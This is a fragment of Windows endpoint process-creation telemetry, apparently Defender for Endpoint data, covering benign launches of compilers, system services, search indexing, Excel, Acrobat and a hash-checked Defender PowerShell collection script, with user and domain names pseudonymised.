+543,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 04:42:33.066075200+00:00,13672,cvtres.exe,"cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Windows\SERVIC~1\LOCALS~1\AppData\Local\Temp\FilePII_0f58942905838d62ffb094e29acb9fd9fd034e1b.tmp"" ""c:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\FilePII_9101a08f00ddb26b76e055aba80c7ed789eac5d3.TMP""",PortableExecutable,2019-12-07 09:10:36.196453400+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe,52744,c877cbb966ea5939aa2a17b6a5160950,1fe531eac592b480aa4bd16052b909c3431434f17e7ae163d248355558ce43a6,2a3249732f5aa4588a4a9895ffe217355041d663,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-23 04:42:32.521722700+00:00,11068,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\3rdmijq4.cmdline""",True,2021-06-23 04:42:26.403973200+00:00,10960,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 04:42:33.181699300+00:00,2021-06-23 04:43:41.860502800+00:00,efd0bc70-8cd9-4f2e-a186-62d3187b746a,computerpii_0a470890c60768167990033d701e7bd881398861,162919,False,10.7740.19041.1052,False,11540474045173524,,11540474045173525,2021-06-23 04:42:32.521722700+00:00,11068,2021-06-23 04:42:32.521722700+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,11068,18560,TerminateProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,2759232,2019-11-24 09:26:27+00:00,2019-12-07 09:10:35.992536100+00:00,2021-06-23 03:01:19.425920800+00:00,2019-12-07 09:10:35.992536100+00:00,2176,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,0.0,257.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler,Microsoft Corporation,Microsoft® .NET Framework,14.10.25028.0,CVTRES.EXE,CVTRES.EXE,Microsoft® Resource File To COFF Object Conversion Utility
+544,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 04:43:07.417568600+00:00,17516,svchost.exe,"""svchost.exe""",PortableExecutable,2020-10-09 20:47:23.714846100+00:00,C:\Windows\System32\svchost.exe,57360,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,cecd78f3ee9d8d5cdb381f3c60ae8b1a,404d8d6ac0005cd7b57aa779ff7aca223c27cef4820c94de0a39c21604d4652b,f70eca243b0409cea2f8f642274cc13f23a22a25,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-14 00:56:58.859290200+00:00,2848,MsMpEng.exe,"""MsMpEng.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 04:43:07.579904300+00:00,2021-06-23 04:43:41.878367+00:00,8a47ee0b-4fbf-4f4c-acfb-bfefc1354e68,computerpii_0a470890c60768167990033d701e7bd881398861,163159,False,10.7740.19041.1052,False,11540474045145394,,11540474045173527,2021-06-14 00:56:58.859290200+00:00,2848,2021-06-14 00:56:58.859290200+00:00,\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MsMpEng.exe,2848,128,ActiveProcessStartkey,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0,136656,1998-01-06 16:00:45+00:00,2021-06-14 00:56:50.126000+00:00,2021-06-14 00:56:58.853571700+00:00,2021-06-14 00:56:51.807361100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MsMpEng.exe,MsMpEng.exe,Antimalware Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services
+545,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 03:21:39.914355100+00:00,11444,LocalBridge.exe,"""LocalBridge.exe"" /InvokerPRAID: Microsoft.MicrosoftOfficeHub notifications",PortableExecutable,2021-05-12 01:05:25.592776700+00:00,C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2104.12721.0_x64__8wekyb3d8bbwe\LocalBridge.exe,169872,9774ac9f3b1c9b7ceb3a28568eff0720,4d18d9aca0208f2c244e751ad6b3d8472308616a1d0caa38988da78aad9c11ae,aa7db5827702c2b0b8e70119a7a3a7a110c4a59a,ba4cfe6461afa1004c52f19c8f2169dc,e86870769ee6c797e09457bd99c58d9bf2303cf0193a24ef9b1222c2c3daf628,ab8539ef6b2a93ff9589dec4b34a0257b6296c92,S-1-12-1-3476864874-1154527411-4288707492-1560701320,domainpii_6c8dcea42fcdd51d2421333a881b2b98b372fa53,userpii_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 03:21:39.813953+00:00,4172,RuntimeBroker.exe,RuntimeBroker.exe -Embedding,False,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 03:21:40.038132200+00:00,2021-06-24 03:23:03.975143900+00:00,984f2e31-149f-4855-a205-7625dba6751f,computerpii_0a470890c60768167990033d701e7bd881398861,174245,False,10.7740.19041.1052,False,11540474045176233,,11540474045176234,2021-06-24 03:21:39.813953+00:00,4172,2021-06-10 00:47:25.157136200+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,3388,128,Missing,c:\windows\system32\runtimebroker.exe,103288,2018-08-18 19:29:32+00:00,2021-02-17 04:34:50.958184300+00:00,2021-06-22 00:44:19.085614600+00:00,2021-02-17 04:34:50.954376500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,128.0,5.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,RuntimeBroker.exe,RuntimeBroker.exe,Runtime Broker,,LocalBridge,18.2104.1272.0,LocalBridge.exe,LocalBridge.exe,LocalBridge
+546,True,System,S-1-5-20,NETWORK SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 03:21:41.705381+00:00,21396,sppsvc.exe,sppsvc.exe,PortableExecutable,2021-06-09 01:20:51.063103400+00:00,C:\Windows\System32\sppsvc.exe,4629312,fe9a6468754a05492be3eea92083c7ab,aca01ec021704b7c814ea3925930441eef77687a295162438a471fda824896b6,fcd2491c0963c340b3dc14c4d118c261b84a525b,d8e577bf078c45954f4531885478d5a9,dfbea9e8c316d9bc118b454b0c722cd674c30d0a256340200e2c3a7480cba674,d7a213f3cfee2a8a191769eb33847953be51de54,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.554990700+00:00,988,services.exe,services.exe,True,2021-06-10 00:46:10.511942500+00:00,912,wininit.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 03:21:41.748619300+00:00,2021-06-24 03:23:03.975556700+00:00,876346aa-77d6-4be1-8d26-76f625074bf0,computerpii_0a470890c60768167990033d701e7bd881398861,174259,False,10.7740.19041.1052,False,11540474045136906,,11540474045176236,2021-06-10 00:46:10.554990700+00:00,988,2021-06-10 00:46:10.554990700+00:00,\Device\HarddiskVolume3\Windows\System32\services.exe,988,128,ActiveProcessStartkey,C:\Windows\System32,714856,2060-05-15 06:03:53+00:00,2021-04-14 01:10:20.152151800+00:00,2021-06-10 00:46:12.753506800+00:00,2021-04-14 01:10:20.136168100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,996,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.928,services.exe,services.exe,Services and Controller app,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1052,sppsvc,sppsvc.exe,Microsoft Software Protection Platform Service
+547,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:19:53.349444200+00:00,3372,rundll32.exe,"rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding",PortableExecutable,2021-02-17 04:35:14.391957+00:00,C:\Windows\System32\rundll32.exe,71680,ef3179d498793bf4234f708d3be28633,b53f3c0cd32d7f20849850768da6431e5f876b7bfa61db0aa0700b02873393fa,dd399ae46303343f9f0da189aee11c67bd868222,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:19:53.436835100+00:00,2021-06-23 01:21:45.328347600+00:00,d53fdf42-f848-443f-aee0-4ab2aff68f64,computerpii_0a470890c60768167990033d701e7bd881398861,157659,False,10.7740.19041.1052,False,11540474045136908,,11540474045172324,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,18560,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,rundll,RUNDLL32.EXE,Windows host process (Rundll32)
+548,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:20:13.473598900+00:00,16848,EXCEL.EXE,"""EXCEL.EXE"" ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\Desktop\Truecoin KYC\GEA collection\FilePII_745f8bd00491193795547f96e223eb8b271405bb.xlsx""",PortableExecutable,2021-06-12 08:57:18.794658+00:00,C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE,64015672,66d31deb154ba9b5df423b98cee537ba,e342bb0be7f5d38f8828968705ccea54ebd706a032bd50237ac4a5738638563c,2f5743f797563878746502bec5ecd37c69bab818,4bf8cf1a2379b0054860ec220ca329b9,63f8608b5eb6ba2d37fffaf46f86363faf15684a367c1603ceb06f0693c877ba,e94fc38810c097a64f7419960f2d21052d1cb2e7,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:19.951048300+00:00,11452,explorer.exe,Explorer.EXE,False,2021-06-23 00:51:19.663301200+00:00,18268,\Device\HarddiskVolume3\Windows\System32\userinit.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:20:14.447990+00:00,2021-06-23 01:21:45.329157800+00:00,3dc5d846-03ef-42cc-9ba1-f5a685bfc744,computerpii_0a470890c60768167990033d701e7bd881398861,157677,False,10.7740.19041.1052,False,11540474045171770,,11540474045172326,2021-06-23 00:51:19.951048300+00:00,11452,2021-06-23 00:51:19.951048300+00:00,\Device\HarddiskVolume3\Windows\explorer.exe,11452,128,ActiveProcessStartkey,C:\Windows,4891752,2074-04-27 14:38:40+00:00,2021-06-09 01:20:37.481306100+00:00,2021-06-23 00:51:19.952611900+00:00,2021-06-09 01:20:37.358875500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,20481.0,1.0,1025.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,explorer,EXPLORER.EXE,Windows Explorer,Microsoft Corporation,Microsoft Office,16.0.13801.20738,Excel,Excel.exe,Microsoft Excel
+549,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 07:36:13.241554+00:00,21088,Acrobat.exe,"""Acrobat.exe"" ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\Desktop\Aplha Node Limited\POI\FilePII_76f75fd5d76bf9457a0ba98bc161822522a22d1e.pdf""",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrobat.exe,3796704,ac7d72262c5389c8cbe58cdddd2083a3,9d84b01f481959d4c8c335af7c1473ba831b698387441a05713527f1dbb517d2,6daf3b0133be331cf2e41a8f4180f01653b91845,4bf8cf1a2379b0054860ec220ca329b9,63f8608b5eb6ba2d37fffaf46f86363faf15684a367c1603ceb06f0693c877ba,e94fc38810c097a64f7419960f2d21052d1cb2e7,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:13.094577200+00:00,18420,explorer.exe,Explorer.EXE,False,2021-06-24 00:52:12.833640100+00:00,13428,\Device\HarddiskVolume3\Windows\System32\userinit.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 07:36:13.358552500+00:00,2021-06-24 07:36:34.685084100+00:00,fe682c2a-ed6d-4e69-8298-7703d72cec78,computerpii_0a470890c60768167990033d701e7bd881398861,177132,False,10.7740.19041.1052,False,11540474045175127,,11540474045177145,2021-06-24 00:52:13.094577200+00:00,18420,2021-06-24 00:52:13.094577200+00:00,\Device\HarddiskVolume3\Windows\explorer.exe,18420,18560,ActiveProcessStartkey,C:\Windows,4891752,2074-04-27 14:38:40+00:00,2021-06-09 01:20:37.481306100+00:00,2021-06-24 00:52:13.096789600+00:00,2021-06-09 01:20:37.358875500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,20481.0,,,,,,,,,Valid,OsVendor,Invalid,Unknown,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,explorer,EXPLORER.EXE,Windows Explorer,Adobe Systems Incorporated,Adobe Acrobat DC,21.5.20048.436468,,Acrobat.exe,Adobe Acrobat DC
+550,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 02:08:50.974275800+00:00,10116,SearchProtocolHost.exe,"""SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe752_ Global\UsGthrCtrlFltPipeMssGthrPipe752 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon"" ",PortableExecutable,2021-06-09 01:20:40.707822200+00:00,C:\Windows\System32\SearchProtocolHost.exe,419328,98ffd56887c1511e98a5542531829025,62d8455ee452be6aa6164426e43f2f1461858dd305a3e784dbd01e32691f30dc,e3228222bbeca59a928647c66c4162d1e33ae4a4,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 02:08:51.602707900+00:00,2021-06-24 02:11:04.526921700+00:00,f07a23ab-cad1-4d53-848a-55c4ff8bf8e2,computerpii_0a470890c60768167990033d701e7bd881398861,173008,False,10.7740.19041.1052,False,11540474045144190,,11540474045175935,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,\Device\HarddiskVolume3\Windows\System32\SearchIndexer.exe,4660,128,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchProtocolHost.exe,SearchProtocolHost.exe,Microsoft Windows Search Protocol Host
+551,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 02:09:07.515554100+00:00,14372,SearchProtocolHost.exe,"""SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320753_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320753 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon""  ""1""",PortableExecutable,2021-06-09 01:20:40.707822200+00:00,C:\Windows\System32\SearchProtocolHost.exe,419328,98ffd56887c1511e98a5542531829025,62d8455ee452be6aa6164426e43f2f1461858dd305a3e784dbd01e32691f30dc,e3228222bbeca59a928647c66c4162d1e33ae4a4,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 02:09:07.755760200+00:00,2021-06-24 02:11:04.527191200+00:00,987c76b4-46ac-4185-8c16-d5a33402a2fe,computerpii_0a470890c60768167990033d701e7bd881398861,173014,False,10.7740.19041.1052,False,11540474045144190,,11540474045175937,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,\Device\HarddiskVolume3\Windows\System32\SearchIndexer.exe,4660,128,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,20480.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchProtocolHost.exe,SearchProtocolHost.exe,Microsoft Windows Search Protocol Host
+552,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:25:36.292197400+00:00,11460,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\TEMP\xwj2gmy4\xwj2gmy4.cmdline""",PortableExecutable,2019-12-07 09:10:35.992536100+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,2759232,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:25:32.310202100+00:00,16528,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_9a4aa4c4b80a29e4911ffd3f764b6a7b37646a69.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_9a4aa4c4b80a29e4911ffd3f764b6a7b37646a69.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '860b4cdd466f2726cb0a70e8e277457c238c85126a012e988ac2e9a21621acfb')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_9a4aa4c4b80a29e4911ffd3f764b6a7b37646a69.ps1' }""",True,2021-06-24 01:25:22.168891200+00:00,11584,SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:25:36.361775300+00:00,2021-06-24 01:27:36.391603300+00:00,10024986-9c90-4779-98e6-be15fc49fb19,computerpii_0a470890c60768167990033d701e7bd881398861,171017,False,10.7740.19041.1052,False,11540474045175622,,11540474045175628,2021-06-24 01:25:32.310202100+00:00,16528,2021-06-24 01:25:32.310202100+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,16528,128,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 01:25:32.352762+00:00,2020-10-09 20:48:24.470101200+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,0.0,257.0,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler
+553,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:25:36.416103100+00:00,20084,cvtres.exe,"cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Windows\TEMP\FilePII_2d2ab69839391c18e4b7f64775a7e9b63899a4b5.tmp"" ""c:\Windows\Temp\xwj2gmy4\FilePII_4c1c56e97b022213474f8a9813ba304e09773963.TMP""",PortableExecutable,2019-12-07 09:10:36.196453400+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe,52744,c877cbb966ea5939aa2a17b6a5160950,1fe531eac592b480aa4bd16052b909c3431434f17e7ae163d248355558ce43a6,2a3249732f5aa4588a4a9895ffe217355041d663,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:25:36.292197400+00:00,11460,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\TEMP\xwj2gmy4\xwj2gmy4.cmdline""",True,2021-06-24 01:25:32.310202100+00:00,16528,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:25:36.442963400+00:00,2021-06-24 01:27:36.391639200+00:00,ad080104-17d4-486d-8e60-73e93a442553,computerpii_0a470890c60768167990033d701e7bd881398861,171018,False,10.7740.19041.1052,False,11540474045175628,,11540474045175629,2021-06-24 01:25:36.292197400+00:00,11460,2021-06-24 01:25:36.292197400+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,11460,16512,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,2759232,2019-11-24 09:26:27+00:00,2019-12-07 09:10:35.992536100+00:00,2021-06-24 00:59:44.006936100+00:00,2019-12-07 09:10:35.992536100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,0.0,257.0,0.0,1.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler,Microsoft Corporation,Microsoft® .NET Framework,14.10.25028.0,CVTRES.EXE,CVTRES.EXE,Microsoft® Resource File To COFF Object Conversion Utility
